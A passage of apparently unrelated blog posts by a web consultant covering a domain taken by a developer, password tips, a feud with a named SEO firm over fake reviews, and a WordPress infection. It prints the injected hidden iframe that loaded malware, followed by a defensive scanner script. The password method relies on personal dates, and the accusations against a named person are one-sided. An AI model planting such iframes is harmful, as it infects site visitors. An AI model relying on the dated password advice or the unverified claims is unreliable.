(The fact that the end product had duplicate title and description tags throughout the site is neither here nor there, and whether a “good job” was done on the SEO is pretty irrelevant at this point, but I thought it should be said here.)
In the spring, after making over $5k in payments since December, she could no longer pay his $550 “maintenance” charge, and wanted to cancel anything ongoing. Plus, she claimed, she never got any form submissions or phone calls, and she was really disappointed.
At this point, after a couple of emails and a phone call, he tells her that it will cost $3150 to both “finish”, and for him to then “give her all the files”.
Also, since she wasn’t paying anymore, and (he says) she owes him money, he told her that if she didn’t pay, he was “taking the site down” as of July 1st!
Now (late June) there’s a disagreement that can’t be rectified, so she needs to do something quick, and that’s when she phoned me, after being referred.
Unfortunately, I eventually found out that she doesn’t own her domain anymore, and that he had stolen it.
How did this happen?
First he explained that he could not use her Yahoo small business account for hosting because they were awful (I agree) and she needed to transfer it to another host.
That means that he simply needed to change her DNS settings a.k.a name servers to change hosts.
That made sense to her, and she didn’t understand all this technical stuff anyway, so she gave him all her usernames and passwords for “web stuff” that she knew of, to make the transition easier.
Next, however, is where this guy crossed the line in my opinion…
Her web host was Yahoo, but she had purchased her domain name from them too, which made Yahoo (Melbourne IT) her registrAR too. (You probably see where this one’s going…)
He told her he needed to “get it off Yahoo” (which I’ve said often enough) but in doing so, he apparently changed the registrAR too, over to one of his own control.
When changing the registrAR, you get an option to keep the same contact details or enter new ones, and he also changed the registrANT as well, as of 12/2008, so he owns it. That’s like having a contractor come in to drywall your basement, and they change the house into their name instead of yours on the deed!
Of course, he was extra sneaky by also adding “Privacy Protection”, so there’s no easily seen public record. The registrant just shows as proxied@Dreamhost etc. but it’s clear what happened.
Contacting Dreamhost was pointless, because it was a done deal, and they’ve NEVER HEARD OF HER AND WILL NOT TALK TO US.
Well, July 1st, this guy has removed the domain from his host, and there’s an empty index folder. We can’t change DNS, because she no longer owns it. We changed domain names, and she now has to get a lawyer involved.
My Recommendation?
I believe this guy is guilty of theft by fraud, and I told her to attempt to file a report with the Portland Police, and to please tell me what they say. I also recommended that she contact a lawyer to sue this guy.
At this point we’re getting her up with a new domain name, but don’t let this happen to you! Be 100% sure you know all this stuff about your domain name.
I’ll update this post with more details as they unfold…
A dozen years ago or so, I had one password that I used for everything, and it wasn’t until some bad experiences that I understood the wisdom of having stronger passwords.
That said, to this day, I have some very simple passwords for literally dozens of online accounts I have in various places, because there’s really only so much need for security on certain accounts, but they’re not common words from the dictionary.
I also have some accounts that I would obviously not want to fall into the wrong hands, but I’m also not willing to give up my most secure passwords to these companies either, and for those I use a different password.
Finally, logging into credit card company or financial institution sites requires an inordinate amount of caution, and that’s why I have three personal “password levels” that I use. While they’re all completely easy for me to remember, they’re not going to be randomly guessed by some software or ‘bot.
Long before I started using Firefox, I either had to remember my passwords or buy Roboform for every computer, so I derived a system that made some sense to me, since I often found myself frustrated by forgetting my passwords.
Jumping ahead to 2009, privacy and security have never been more important, and the odds are you haven’t begun using stronger passwords, have you?
After a recent very ugly hacking of a website on our hosting, where the FTP password was set to “password”, I’d like to recommend that you go change some of them right now.
In my opinion, you absolutely must create a stronger password for your:
- E-mail accounts
- Web property logins & FTP access
- Web logins that have financial implications
Why use a stronger email password?
With a simple e-mail password, hackers can run scripts on mail servers trying common usernames and common passwords, and frequently they are successful gaining entrance to someone’s Web mailbox.
When someone gets access to a mail server with a username and password that validates, they can easily point their zombie spam machines to your mail server and begin to send out millions and millions of e-mails hour after hour. This does a couple of things, including bringing your mail server to its knees and getting everyone that’s hosted on that mail server banned for at least a few hours while the mess gets cleaned up.
Why use a stronger web / FTP password?
Most hackers aren’t content anymore with just defacing your site, now there’s a purpose to their hacking, i.e. some sort of financial gain.
When someone gets access to your Web logins and they can change your site, they’re also able to upload malicious scripts that can infect unsuspecting site visitors with various viruses, malware, adware and spyware.
In the old days, when spyware was relatively new, you could usually tell when you had some crapware on your system because it ran poorly, and this led to the rise of various spyware removal and prevention software.
Today however, the crapware designers do a much better job, and it’s highly likely that if you get spyware from a website, you may not even notice a performance hit. As the industry has become much more lucrative, talented programmers can write software to do their bidding on your PC without you even noticing.
For all you know, some well-written spyware could be using your home computer to log in at 11 at night to send a few thousand e-mails out, and be completely done by 3 a.m. only to sit dormant and not affect your regular daily use.
Why use stronger Financial Passwords?
Well, duh – For your online banking and purchasing, someone could conceivably log in as you, and trade stocks, transfer funds, and basically wipe you out financially just as surely as if you let the government do it for you.
That’s why you need secure passwords, and you need passwords you can remember.
How can you create a secure yet memorable password?
Secure passwords should have a combination of both upper and lower case letters, as well as numerals, to keep the hackers at bay, and here’s my preferred way to create secure passwords that I can’t forget…
Think of an event that has some meaning for you and think of it as a written sentence. Then use the first letter of each word, and the numbers, for your password.
For example -
“My dog Fido died on May 10 1990” and your password would be MdFdoM101990
Or -
“My son Joe was born on May 10, 2000” and the password becomes, MsJwboM102000 – get it?
You might choose to just use the last two digits for the year, or perhaps all four, but use a pattern that you can remember.
Use your wife’s birthday, or something else that you could NEVER forget, and make sure to use at least two capital letters and at least two numbers.
If you want it truly unique for each website, and even more secure, you could try also adding the first letter of the domain you’re logging into.
# and $ signs and a few other characters are secure too, but keep in mind that some servers won’t accept them.
I’ll wait here while you go change your passwords right now, because believe me, someone really IS trying to get in your account, and maybe they’re trying right now!
*** Update March 2010***
My friend’s sister just found out that she was locked out of her hotmail account, and after a few minutes she realized she was locked out of her bank account too, and a couple of others. Someone had apparently gained access to her mail account, so I got a panicked call.
Her password was a simple one, and with it, they changed her security questions in case she noticed, then they reset passwords elsewhere, (since they had control of her email account for verification they could do that!), and as of this writing, she’s on the phone with US Bank after about 20 minutes of digging to find this link at Microsoft which led to this Microsoft account recovery form.
Change your passwords NOW.
Peak Studios is a “search marketing firm” in Colorado that deserves special recognition for being incredibly stupid. Apparently, they’ve decided to leave fake negative reviews on my local business profile in Google, and they’ve done the same thing to several other members of the SEMpdx board of directors.
The owner, Quince Wyss, has now moved from a simple ignorance about marketing tactics into complete and total idiocy, and I’m sharing the story here because he’s crossed the line with these personal attacks.
The Story:
Back in October, someone posted twice in a row at the SEMpdx forums with two poorly written self promotional articles that were not only poorly written, but also had embarrassingly bad formatting, grammar, and punctuation.
As a forum moderator, I was just going to delete them when I noticed something comical – The “service” being hawked in these two pieces of junk were for an SEO / SEM company in Colorado named Peak Studios.
The person that posted even left their name, company name, and their email address, website and phone number, on both of these ridiculous “contributions”.
First I laughed, and then I Twittered this – “If you were an SEO company, would you forumspam us at SEMpdx? Duh. So, I’m calling [unlinked here] Peakstudios.com and I’ll report back”.
I realized it might just be someone trying to make Peak Studios look bad, so I decided to phone the company and alert them to what had been done.
How Did Peak Studios React?
You can imagine my surprise when the owner, Quince Wyss, told me that they DID have an employee with that name, and Quince said he wanted to see what the employee had written.
I forwarded the “articles” to him by email, expecting to get a message back that he was embarrassed and sorry, and that the employee would undergo some training about what is and isn’t appropriate. Certainly he’d train him more about how they want to portray themselves in the public eye, right?
I hung up thinking I had done a good deed, but an hour later I got an email back from him actually defending this crap, and he also “demanded” that I retract what I had said on Twitter!
Well, never one to miss an opportunity, I wrote an article called “Forum Spam is in the Eye of the Beholder” and posted on the SEMpdx blog, calling out Peak Studios by name as defending the practice of spamming forums.
Todd Mintz submitted it to Sphinn, where agreement was nearly 100% that this guy was in the wrong. Well known and respected internet marketers like Jill Whalen, John Andrews, Daria Goetsch, Nick Wilsdon, Kim (Krause) Berg and many others all seemed to agree that yeah, it was totally inappropriate.
But after seeing the internet community lined up against him, did Quince Wyss see the error of his ways and do the right thing and apologize?
No – of course not. Peak Studios continued to argue the point as the only defender on the thread, Opiumden. The debate got so ridiculous that commenting was turned off by administrators.
Was that the end of it?
Oh no, not by a long shot. This genius then actually phoned both Kent Lewis, the past president at SEMpdx, and Ben Lloyd, the current president, and “demanded” that my article be removed, threatening lawsuits, retaliation, and blah blah blah.
Quince claimed both that I had edited his “articles to make him look bad” (LOL – why would anyone do that?), and he said that there was “nothing wrong with what he’d done”.
At that point it became even more ridiculous, as several emails went around among the SEMpdx board before we all decided unanimously that the article should stay up.
I mean, here’s a “search marketing firm” engaging in the same exact kind of forum spam that you see for Viagra, but it was for their own industry, their own business, and they were actually DEFENDING it! We all found it incredible.
So, Ben basically told the guy to take a hike and to go ahead and call his lawyer, because we all agreed he was clearly off his tree.
Was that the end? Oh no, just wait, it gets better…
Earlier this week, someone supposedly named “Jesse Vandalino” posted a silly but negative comment about SEMpdx on a very old outdated blog post at Matt McGee’s Small Business Marketing blog.
Matt emailed Todd Mintz and asked him if the name “Jesse Vandalino” rang any bells, which it didn’t, and we all suspected that it might be this guy from Peak Studios trying to engage in some reputation damagement.
Then Friday, someone at the office of Anvil Media noticed a negative review on their Google Maps profile, and Tom Hale, another SEMpdx forum admin and advisory board member ALSO had a negative review added to his Google profile.
I heard about this all on Saturday, and a quick look at my own Google profile turned up the one and only negative review ever written about my company. Sure enough, it too could be tracked back to this bozo at Peak Studios. Here’s a copy, in case I can get it removed…
Why am I writing this now?
Because after seeing this fake review, I was so mad that I picked up the phone and called Peak, leaving a profane voicemail that he should have some balls and call me. What did he do? Did he “man up” and phone me? No.
After editing out his own name, his company name, and the dirty deeds I was accusing him of, he then posted the voicemail on youtube in another public smear attempt. (I guess it serves me right, but I was genuinely pissed!)
That wasn’t enough though, and he began contacting others, like the East Portland Chamber of Commerce, and linking to the Youtube edited voicemail with more comment spam.
THEN he went back into my Google profile and added another fake review, this one with reference to the voicemail!
If this guy will spam our forum, then go to all the trouble to attack us personally when he’s so clearly wrong in the first place, what might he do for his clients?
I took a look at just the first client listed in their “web portfolio” and here’s a short video of how they “market”, including:
- Making up fake user profiles
- Leaving fake favorable reviews for clients
- Slandering client competitors by leaving fake negative reviews
Here is my proof that they are leaving fake reviews!
What’s the most disturbing is NOT that he’s too stupid to realize that they spammed in the first place.
It’s not even that he’s so dumb that he used the same user accounts making this so easy to uncover.
No, what’s most disturbing is that there are businesses in Colorado that are falling prey to the supposed “internet marketing services” of Quince Wyss at Peak Studios, and they are risking their business reputation.
Don’t take my word for it; check them out for yourself! Here are a few fake user reviews I found for ChemDry carpet cleaning, a Peak Studios client – One, two, three, four
Here’s one where they also did a fake negative review of a competitor, and here’s another fake negative competitor review. Here’s one competitor hit with 5 negative reviews
It’s one thing to engage in some negative smear campaign against me or SEMpdx – we’re big boys & girls and can take care of ourselves.
What they’re doing is posting fake reviews of their own clients, and they’re posting fake negative reviews about their clients’ competitors! That is SO far over the top that I think they should be sued.
Only the most despicable company would engage in a negative campaign of actual lies about the competitors of their clients, right?
Do you think their clients have agreed to let them play that way?
Update – 14 months later, Peak Studios is at it again so I’m closing comments here – please go to the new thread…
I was at a friend’s home a couple of weeks ago, and he was complaining about a virus on his computer. Try as he might, he could not get rid of this virus. I took a look and thought I was able to remove it, but he said that the next day it came back.
Ultimately he ended up having a local computer repair person come out, who cleaned up his system in a couple of hours and the problem went away, but today we talked by phone, and he told me he got the warning again when he viewed his own blog.
I took a look at his blog and here’s what I saw -
Interesting! I recognize the IP address from the file that I couldn’t seem to get rid of while I was visiting, so now we had our culprit. We knew where his virus came from… it came from his own WordPress blog!
At that point I did a little bit of research, and found a post on the WordPress support forum talking about this very issue, where it seemed that someone had inserted this code into one of someone else’s old posts.
<!-- Traffic Statistics --> <iframe height="1" width="1" frameBorder="0" src="http://www.wp-stats-XXXphp.info/iframe/wp-stats.XXXphp"></iframe><!-- End Traffic Statistics -->
At that point it was a matter of picking through all of his posts manually, and viewing the html code of each one, before finding and deleting it. Of course, in his case, it was found in 8 different posts! It was coming from http://61.155.8.157/iframe/wp-stats.php and was a VBS Malware-gen
Luckily he’s an infrequent poster, but can you imagine how difficult this may have been if there were multiple users posting everyday?
The moral of the story? Moderate your new users, use a secure password, keep your WordPress current (his was not) and watch out for strange e-mail addresses signing up as new users!
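The post-by-post search described above can be scripted. This added example (not from the original post) flags iframes that are effectively invisible and load from a host other than the blog's own. The blog host name, the size threshold and the sample posts are assumptions constructed for illustration, and the injected frame's host is a placeholder.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

MAX_HIDDEN_PX = 2  # assumption: frames this small or smaller count as invisible

# Constructed sample posts keyed by post id; post 101 carries the injected pattern.
SAMPLE_POSTS = {
    101: '<p>Trip report.</p>\n<!-- Traffic Statistics --> <iframe height="1" width="1" '
         'frameBorder="0" src="http://stats.attacker.invalid/iframe/wp-stats.php"></iframe>'
         '<!-- End Traffic Statistics -->',
    102: '<iframe width="560" height="315" src="https://www.youtube.com/embed/VIDEO_ID"></iframe>',
    103: '<p>Plain text post.</p>',
    104: '<iframe width="1" height="1" src="/wp-content/pixel.html"></iframe>',
}


def px_value(value):
    """Parse a width/height attribute such as '1' or '1px'; None if absent or not numeric."""
    if value is None:
        return None
    value = value.strip().lower()
    if value.endswith("px"):
        value = value[:-2]
    return int(value) if value.isdigit() else None


class IframeFinder(HTMLParser):
    """Record iframes that are both hidden and served from a foreign host."""

    def __init__(self, own_host):
        super().__init__()
        self.own_host = own_host.lower()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}  # attribute names arrive lower-cased
        host = (urlsplit(a.get("src", "")).hostname or "").lower()
        external = bool(host) and host != self.own_host \
            and not host.endswith("." + self.own_host)
        w, h = px_value(a.get("width")), px_value(a.get("height"))
        style = a.get("style", "").replace(" ", "").lower()
        hidden = (
            (w is not None and w <= MAX_HIDDEN_PX)
            or (h is not None and h <= MAX_HIDDEN_PX)
            or "display:none" in style
            or "visibility:hidden" in style
        )
        if external and hidden:
            self.hits.append({"src": a.get("src"), "host": host, "line": self.getpos()[0]})


def scan_posts(posts, own_host):
    """posts maps post id -> HTML body; returns {post_id: [hits]} for flagged posts only."""
    flagged = {}
    for post_id, body in posts.items():
        finder = IframeFinder(own_host)
        finder.feed(body)
        if finder.hits:
            flagged[post_id] = finder.hits
    return flagged
```

On a real WordPress site the post bodies would come from the `post_content` column of the `wp_posts` table, and every flagged post still needs a manual look before anything is deleted.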
























